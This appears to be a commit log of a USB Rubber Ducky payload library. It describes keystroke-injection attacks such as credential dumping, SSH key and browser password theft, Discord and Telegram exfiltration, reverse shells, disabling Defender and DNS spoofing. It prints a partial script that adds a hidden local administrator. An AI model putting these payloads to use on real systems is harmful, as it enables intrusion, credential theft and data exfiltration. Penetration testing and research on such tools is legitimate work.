- payloads/library/credentials/DuckyLogger/payload.txt
- payloads/library/credentials/sudoSnatch/payload.txt
- payloads/library/remote_access/duckNet/payload
- payloads/library/remote_access/persistentReverseDucky/payload.txt
Replacing multi-user.target with default.target as multi-user.target is removed from all systemd Units.
> Changing systemd Unit

- payloads/library/prank/Rick_Rolling_Forever/payload.txt
Creates a batch file that opens a Rick Roll every 5 mins, using the default browser. The script is self-contained as it creates the batch, starts it, then minimizes the window. Though designed for Windows, it is easily modified to work on any OS with a browser.
> Add Rick Rolling Forever

- payloads/library/execution/Add_Local_Admin/payload.txt
REM Title: Add_Local_Admin
REM Description: PowerShell is opened, and a script
REM runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Category: Execution
DELAY 2000
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
ALT TAB
DELAY 3000
STRING $Username = "Admin2"
DELAY 5000
ENTER
STRING $Password = "password"
DELAY 5000
ENTER
STRING $group = "Administrators"
DELAY 5000
ENTER
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 5000
ENTER
STRING if ($existing -eq $null) {
DELAY 5000
ENTER
STRING Write-Host "Creating new local user $Username."
DELAY 5000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
ENTER
STRING Write-Host "Adding local user $Username to …
> Add_Local_Admin

- payloads/library/prank/MacOS-Remap-Dvorak/payload.txt
Changes every key from QWERTY to Dvorak. Resets after OS restart or using the revert script in my github repo. The reset script `STRINGS` are written in dvorak because all keys are converted, and the rubber ducky emulates a keyboard ;)
> MacOS key remapper to Dvorak

- payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
- payloads/library/remote_access/ReverseDuckyIII/payload.txt
Updated ReverseDucky to use DuckyScript 3.0.
-Increased reliability 
-more verbosity
-easier to use
Still defeats default MS Defender
> Updated ReverseDucky to version 2.0

- payloads/library/execution/Disable_Windows_Defender22H2/Disable_Windows_Defender.txt
- payloads/library/execution/Disable_Windows_Defender22H2/Payload.txt
You can choose between disabling/restoring with and without PS History deletion.
You could also modify the Term Windows Security Center via DEFINE
> Disabling Defender on Win 22H2 Maschines

- payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
- Added DuckyScript 3.0 usage
- Inserting into non Windows machines, the Ducky won't execute the payload and will appear broken
> Updated ReverseDucky2 to Version 2

- payloads/library/remote_access/EnableSSH-Android/payload.txt
This payload will Enable SSH on an android device with Termux installed. Termux should be installed through F-Droid for best results (this will ensure the correct repos are in use). This has been tested with android tablets and phones.
> Enable SSH - Android Payload

- payloads/library/prank/USBScream/Payload.txt
Title: USBScream
Author: Korben
Description: a payload that replaces the windows device disconnect sound with a scream
updated and improved to use DuckyScript 3
Target: Windows only -- all other OS will result in ATTACKMODE OFF and RED LED
Category: Prank
Adapted from ORIGINAL DuckyScript 1.0 Version:
featured on 'Painful Screaming Payload of DOOM - Hak5 2517'
https://www.youtube.com/watch?v=nuN6PqrnB7Q
https://forums.hak5.org/topic/46078-payload-making-windows-scream-when-you-unplug-devices/
> add USBScream payload updated for DS3

- payloads/library/remote_access/ReverseDuckyPolymorph/README.md
- payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
Fixes:
`VAR $var_gibberish = $_RANDOM_INT` will not work as intended - **INJECT_VAR use requires scancodes** - $_RANDOM_INT is a decimal 0-9 stored as an unsigned integer. Replace with
`VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE` to produce a random number _scancode_ for use with INJECT_VAR
`VAR $var_gibberish4 = $_RANDOM_CHAR_KEYCODE` has a non-0% chance of breaking the payload due to the fact that it can produce characters that _are not allowed in variable names_ -- for example it _might_ produce a `^` thus breaking the entire Powershell script. 
References: https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization#random-keystroke-injection and https://beta.payloadstudio.hak5.org/community/CHANGELOG.html (see INJECT_VAR - pending documentation update once 1.3 is …
> small fixes to ReverseDuckyPolymorph

- payloads/extensions/community/Rolling_Powershell_Execution
Start Powershell in different ways through obfuscation, uncommon start paramters and randomisation. This extension may help to evade basic and bad detection methods of starting powershell.
> Created Extension: Rolling_Powershell_Execution

- payloads/library/recon/x-frame-options_scanner/README.md
- payloads/library/recon/x-frame-options_scanner/payload.txt
- payloads/library/recon/x-frame-options_scanner/recon_files/assets/css/style.css
- payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/constants.js
- payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/recon.js
- payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/sleep.js
- payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/functions/targets.js
- payloads/library/recon/x-frame-options_scanner/recon_files/assets/js/main.js
- payloads/library/recon/x-frame-options_scanner/recon_files/index.html
Uses the "Microsoft Edge" web browser to search for web servers within 
a range of IPv4 addresses that do not have an "X-Frame-Options" header.
Then exports the results to a PDF file accessible in the Rubber Ducky.
The results contain the tested IPv4 addresses and the HTML rendering.
> Add "X-Frame-Options" Scanner

- payloads/extensions/windows_hid_exfil.txt
Removed redundant exit command in payloads/extensions/windows_hid_exfil.txt , line 54
> Removed redundant exit command

- payloads/extensions/community/Rolling_Powershell_Execution
- payloads/extensions/community/Windows_Elevated_Execution
- payloads/library/credentials/SamDumpDucky/README.md
- payloads/library/credentials/SamDumpDucky/payload.txt
- payloads/library/remote_access/ReverseDuckyUltimate/README.md
- payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
- Added Windows 11 mode, for Windows 11 hosts, not supporting a hidden Powershell by default
- Added extension Detect_Finished to signal the successful execution of the Duckyscript part
- Adapted certain Extensions to meet newer versions
- Updated SamDumpDucky to use DuckyScript3 features and certain triggers
> ReverseDuckyUltimate Update: 1.3, SamDumpDucky Update 2.0

- payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
- payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump.
I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.
> Dump Windows Memory Through ProcDump

- payloads/library/execution/BeEF_Injection/payload.txt
Hello,
please read the previous commit.
Thank you.
> Wino willy BeEF Injection

- payloads/library/exfiltration/ExfiltrateSSHKeys/README.md
- payloads/library/exfiltration/ExfiltrateSSHKeys/payload.txt
The ExfiltrateSSHKeys payload can be used to check for the existence of the ~/.ssh directory and exfiltrate its contents to the USB Rubber Ducky. In addition, the payload performs a recursive search on a pre-defined parent directory, looking for any private key files and subsequently exfiltrating them.
> adding new ExfiltrateSSHKeys payload

- payloads/library/credentials/DuckyLogger/payload.txt
- payloads/library/credentials/DuckyLogger2/payload.txt
Watched the recent YouTube video and noticed some minor possible improvements to the payload.
> Patch ducky logger

- payloads/library/exfiltration/Copy-And-Waste/payload.txt
- payloads/library/exfiltration/Google-Exfil/README.md
- payloads/library/exfiltration/Google-Exfil/payload.ps1
- payloads/library/exfiltration/Google-Exfil/payload.txt
- payloads/library/exfiltration/Lazagne-Exfil/README.md
- payloads/library/exfiltration/Lazagne-Exfil/payload.ps1
- payloads/library/exfiltration/Lazagne-Exfil/payload.txt
- payloads/library/mobile/iOS/Open_Link/README.md
- payloads/library/mobile/iOS/Open_Link/payload.txt
+ Added payload for opening links for IOS 17 and older
+ Added Lazagne exfil payload for exfiltrating all passwords through telegram bot
+ Added Google exfil payload that uses 7zip to zip user data, upload it to file-sharing service and send download link through telegram bot or discord webhook.
+ Fixed some mistakes in Copy and Waste
> 1 New Mobile IOS payload | 2 New Exfiltration payloads

- payloads/library/credentials/Local_WLAN_Borrower/1.ps1
- payloads/library/credentials/Local_WLAN_Borrower/README.md
- payloads/library/credentials/Local_WLAN_Borrower/payload.txt
My payload intends to get all saved WLAN info stored on a Windows 10/11 machine and put it onto the ducky as a .txt file.
It only requires the USB name to be changed and a .ps1 script added to the root of the duckys' storage.
> Add Local_WLAN_Borrower payload

- payloads/library/execution/Install_Official_VSCode_Extension/README.md
- payloads/library/execution/Install_Official_VSCode_Extension/payload.txt
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems.
The extension to be installed is specified via the `publisher.extensionName` parameter.
The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
> Install Official VSCode Extension

- payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/README.md
- payloads/library/execution/Install_Any_Arbitrary_VSCode_Extension/payload.txt
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
> Install Any Arbitrary VSCode Extension

- payloads/library/execution/Replace_Links_In_GithubDesktop/README.md
- payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.
> Replace Links In GithubDesktop

- payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md
- payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
Developer by [bst04](https://github.com/brunoooost) and me
> Exfiltrate Mac Address - MacOS

- payloads/library/execution/DNS_spoofer/README.md
- payloads/library/execution/DNS_spoofer/payload.txt
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
> DNS spoofer

- payloads/library/execution/Win_Get-TrustedInstaller/README.md
- payloads/library/execution/Win_Get-TrustedInstaller/TrustedInstaller.ps1
- payloads/library/execution/Win_Get-TrustedInstaller/payload.txt
- Title:         Execute commands as 'NT AUTHORITY\SYSTEM' with 'TrustedInstaller' privileges
- Author:        TW-D
- Version:       1.0
- Category:      Execution
Launch a new cmd.exe process with elevated privileges under TrustedInstaller,
by setting the TrustedInstaller process as the parent, the cmd.exe process inherits TrustedInstaller's privileges.
> Execute commands as SYSTEM with TrustedInstaller privileges

- payloads/library/exfiltration/MacOS_Silent_Exfiltration_Important_Files/README.md
- payloads/library/exfiltration/MacOS_Silent_Exfiltration_Important_Files/payload.txt
**Note**: This script is created for Original USB Rubber Ducky, This may not work on the newer version of rubber ducky but I am not sure.
Added a new exfiltration payload that uses Discord webhooks for file collection. This script provides several advantages over traditional USB-based exfiltration:
- No USB storage limitations
- Faster execution through direct upload
- Completely silent operation
- Self-cleaning functionality
- No visible UI after the script has been initialised, you can remove it in a few seconds.
Key features:
- Collects PDFs, Word docs, text files, and images
- Searches user directories recursively
- File size aware (respects Discord's 8MB limit)
- Automatic cleanup of all traces
- Works on both Intel and Apple Silicon Macs
Tested working on the latest version of macOS …
> Silent File Exfiltrator using Discord Webhooks - MacOS

- payloads/library/prank/-RD-Russian-Roulette/README.md
- payloads/library/prank/-RD-Russian-Roulette/payload.txt
- payloads/library/prank/-RD-Russian-Roulette/russianroulette.ps1
What does it do: User is forced to play a game of Russian Roulette
How can people use this payload: This payload can be used to prank friends into thinking that a virus will be installed on their computer if they don't win. It's also fun to see them react when they don't win the game and are rewarded with a rickroll for losing.
> Added Russian Roulette

- payloads/library/execution/Camouflage_Your_Backdoor/README.md
- payloads/library/execution/Camouflage_Your_Backdoor/payload.txt
- payloads/library/execution/Camouflage_Your_Backdoor/script.sh
This repository contains a demonstration **USB Rubber Ducky payload** called **Camouflage Your Backdoor**. The purpose of this script is to show how easily an attacker can hide malicious connections from system administrators or regular users by **overriding** the `netstat` command in a **Debian-based** environment (or any system using `~/.bashrc`). 
Obviously in a real-world context this is not enough, but this is intended to give insight into one of the mechanisms often used to do this sort of thing.
> Camouflage Your Backdoor

- payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/README.md
- payloads/library/exfiltration/ExfiltrateWindowsCredentials/KeystrokeReflection/payload.txt
- payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/README.md
- payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/payload.txt
- payloads/library/exfiltration/ExfiltrateWindowsCredentials/NetworkMedium/server.py
- payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/README.md
- payloads/library/exfiltration/ExfiltrateWindowsCredentials/PhysicalMedium/payload.txt
The added payloads perform credential dumping by creating a memory dump of the lsass.exe process via the TaskManager and using mimikatz to extract NTLM hashes. These sensitive credentials are then exfiltrated in three different ways:
Over a physical medium by writing the data to the USB Rubber Ducky's SD storage
Over a network medium by uploading the data to a webserver
Via Keystroke Reflection
The payload further performs adequate cleanup after the exfiltration is completed.
Changes requested in a previous pull request (#519) have been implemented and include restructuring of the files, OS detection and a notice that the PowerShell history file is removed after the payload finishes execution.
> Added payload to exfiltrate Windows credentials using different techniques.

- payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
- payloads/library/credentials/Brave_Breacher/README.md
Brave Breacher is a side-channel attack payload that utilizes various methods to navigate the Brave Browser GUI (Linux). The payload has two phases: Phase 1, all username and password credentials stored in the browser are exported to be exfiltrated. Phase 2, the payload then navigates to the payment method settings menu and screenshots the stored payment method. The files are then moved to the /Pictures/Screenshots directory, tarballed, and then exfiltrated via Discord webhook. All files in the /Pictures/Screenshots directory are then shredded, the terminal history is cleared and all windows opened are closed to obfuscate activity.
> Added: Brave_Breacher.

- payloads/library/exfiltration/edit2exfil/README.md
- payloads/library/exfiltration/edit2exfil/payload.txt
edit2exfil is an exfiltration payload that builds a shell script (.e2e.sh) that will embed itself as a `cronjob`. The script is ran daily at 10:00 AM (this can be adjusted, see ReadMe), silently in the background.
The script first checks if the target machine is connected to the internet by sending a PING to Hak5.org, if successful, it searches for various filetypes and their respective documents in the /home directory (recursively) that have been modified (edited) in the past 24 hours. If found, it tarballs them and exfiltrates them via Discord webhook.
This allow for persistent file exfiltration of files daily, as they are updated.
Total payload run time: 7 seconds.
> Added: edit2exfil

- payloads/library/mobile/Android/Brisket_Breacher/README.md
- payloads/library/mobile/Android/Brisket_Breacher/homepage.html
- payloads/library/mobile/Android/Brisket_Breacher/payload.txt
Brisket_Breacher is an Android mobile payload that targets the Google Chrome browser.  The homepage of the browser is replaced with a malicious URL that points to a functioning imitation Google search homepage. The imitation homepage contains a Browser Exploitation Framework (BeEF) hook that calls to a BeEF command and control server, allowing an attacker to have control over the victims browser.
> Added Brisket_Breacher
